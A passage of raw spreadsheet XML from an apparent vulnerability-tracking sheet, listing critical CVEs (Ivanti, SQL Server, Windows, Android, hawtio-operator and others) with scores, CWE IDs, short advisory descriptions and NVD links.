t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.002</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr" /><c r="M15" s="5" t="inlineStr" /><c r="N15" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="S15" s="5" t="inlineStr"><is><t>A flaw was found in hawtio-operator. The operator reads the OpenShift Service CA private signing key from the openshift-service-ca namespace and uses it to mint client certificates with a Subject Common Name (CN) supplied by the author of a namespaced Hawtio custom resource. Because the operator ships a ClusterRole that aggregates Hawtio CR permissions into the edit and admin roles, any user with edit access in any namespace can obtain a Service-CA-signed certificate with an arbitrary subject. This certificate can be used to impersonate any in-cluster service identity to peers that trust the Service CA for client authentication, including Jolokia agents and other Service-CA-trusting components.</t></is></c><c r="T15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-86464</t></is></c><c r="D16" s="5" t="n"><v>9.9</v></c><c r="E16" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.004</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr"><is><t>kubernetes, docker, postgresql, keycloak</t></is></c><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr" /><c r="M16" s="5" t="inlineStr" /><c r="N16" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P16" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr"><is><t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t></is></c><c r="S16" s="5" t="inlineStr"><is><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is></c><c r="T16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-12744</t></is></c><c r="D17" s="5" t="n"><v>9.800000000000001</v></c><c r="E17" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.022</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr" /><c r="M17" s="5" t="inlineStr" /><c r="N17" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O17" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P17" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S17" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-12745</t></is></c><c r="D18" s="5" t="n"><v>9.800000000000001</v></c><c r="E18" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.021</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr" /><c r="M18" s="5" t="inlineStr" /><c r="N18" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O18" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P18" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S18" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-28606</t></is></c><c r="D19" s="5" t="n"><v>9.800000000000001</v></c><c r="E19" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.003</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L19" s="5" t="inlineStr" /><c r="M19" s="5" t="inlineStr" /><c r="N19" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O19" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P19" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S19" s="5" t="inlineStr"><is><t>In handleBondStateChanged of AdapterService.java, there is a possible way to skip pairing due to a logic error in the code. This could lead to remote escalation of privilege without user consent with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-49921</t></is></c><c r="D20" s="5" t="n"><v>9.800000000000001</v></c><c r="E20" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.003</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr" /><c r="M20" s="5" t="inlineStr" /><c r="N20" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S20" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-58240</t></is></c><c r="D21" s="5" t="n"><v>9.800000000000001</v></c><c r="E21" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.003</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr" /><c r="M21" s="5" t="inlineStr" /><c r="N21" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P21" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q21" s="5" t="inlineStr" /><c r="R21" s="5" t="inlineStr"><is><t>CWE-308</t></is></c><c r="S21" s="5" t="inlineStr"><is><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is></c><c r="T21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-58822</t></is></c><c r="D22" s="5" t="n"><v>9.800000000000001</v></c><c r="E22" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr" /><c r="M22" s="5" t="inlineStr" /><c r="N22" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q22" s="5" t="inlineStr" /><c r="R22" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S22" s="5" t="inlineStr"><is><t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-61516</t></is></c><c r="D23" s="5" t="n"><v>9.800000000000001</v></c><c r="E23" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.004</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr" /><c r="M23" s="5" t="inlineStr" /><c r="N23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q23" s="5" t="inlineStr" /><c r="R23" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S23" s="5" t="inlineStr"><is><t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an information disclosure vulnerability that allows unauthenticated attackers to retrieve the administrator password by sending a request to the sysinfo action in the web management interface without a valid session. Attackers can replay the exposed credential against the login handler to establish a fully authenticated administrator session on the device.</t></is></c><c r="T23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-66302</t></is></c><c r="D24" s="5" t="n"><v>9.800000000000001</v></c><c r="E24" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.005</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L24" s="5" t="inlineStr" /><c r="M24" s="5" t="inlineStr" /><c r="N24" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P24" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q24" s="5" t="inlineStr" /><c r="R24" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S24" s="5" t="inlineStr"><is><t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-67631</t></is></c><c r="D25" s="5" t="n"><v>9.800000000000001</v></c><c r="E25" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.006</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K25" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L25" s="5" t="inlineStr" /><c r="M25" s="5" t="inlineStr" /><c r="N25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P25" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q25" s="5" t="inlineStr" /><c r="R25" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S25" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-67643</t></is></c><c r="D26" s="5" t="n"><v>9.800000000000001</v></c><c r="E26" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.008</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K26" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L26" s="5" t="inlineStr" /><c r="M26" s="5" t="inlineStr" /><c r="N26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P26" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q26" s="5" t="inlineStr" /><c r="R26" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S26" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-68839</t></is></c><c r="D27" s="5" t="n"><v>9.800000000000001</v></c><c r="E27" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.008</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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7" s="5" t="inlineStr" /><c r="M27" s="5" t="inlineStr" /><c r="N27" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P27" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q27" s="5" t="inlineStr" /><c r="R27" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S27" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-69276</t></is></c><c r="D28" s="5" t="n"><v>9.800000000000001</v></c><c r="E28" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.008999999999999999</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr" /><c r="M28" s="5" t="inlineStr" /><c r="N28" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q28" s="5" t="inlineStr" /><c r="R28" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S28" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-69408</t></is></c><c r="D29" s="5" t="n"><v>9.800000000000001</v></c><c r="E29" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.01</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr" /><c r="K29" s="5" t="inlineStr" /><c r="L29" s="5" t="inlineStr" /><c r="M29" s="5" t="inlineStr" /><c r="N29" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P29" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q29" s="5" t="inlineStr" /><c r="R29" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S29" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-69431</t></is></c><c r="D30" s="5" t="n"><v>9.800000000000001</v></c><c r="E30" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.008999999999999999</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr" /><c r="M30" s="5" t="inlineStr" /><c r="N30" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q30" s="5" t="inlineStr" /><c r="R30" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S30" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-69463</t></is></c><c r="D31" s="5" t="n"><v>9.800000000000001</v></c><c r="E31" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.008999999999999999</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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1" s="5" t="inlineStr" /><c r="M31" s="5" t="inlineStr" /><c r="N31" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q31" s="5" t="inlineStr" /><c r="R31" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S31" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-69491</t></is></c><c r="D32" s="5" t="n"><v>9.800000000000001</v></c><c r="E32" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.008999999999999999</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr" /><c r="M32" s="5" t="inlineStr" /><c r="N32" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q32" s="5" t="inlineStr" /><c r="R32" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S32" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-69493</t></is></c><c r="D33" s="5" t="n"><v>9.800000000000001</v></c><c r="E33" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.01</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr" /><c r="K33" s="5" t="inlineStr" /><c r="L33" s="5" t="inlineStr" /><c r="M33" s="5" t="inlineStr" /><c r="N33" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q33" s="5" t="inlineStr" /><c r="R33" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S33" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-69496</t></is></c><c r="D34" s="5" t="n"><v>9.800000000000001</v></c><c r="E34" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.01</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr" /><c r="M34" s="5" t="inlineStr" /><c r="N34" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q34" s="5" t="inlineStr" /><c r="R34" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S34" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-69525</t></is></c><c r="D35" s="5" t="n"><v>9.800000000000001</v></c><c r="E35" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.01</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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5" s="5" t="inlineStr" /><c r="M35" s="5" t="inlineStr" /><c r="N35" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q35" s="5" t="inlineStr" /><c r="R35" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S35" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-69579</t></is></c><c r="D36" s="5" t="n"><v>9.800000000000001</v></c><c r="E36" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.01</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr" /><c r="M36" s="5" t="inlineStr" /><c r="N36" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q36" s="5" t="inlineStr" /><c r="R36" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S36" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-69586</t></is></c><c r="D37" s="5" t="n"><v>9.800000000000001</v></c><c r="E37" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F37" s="5" 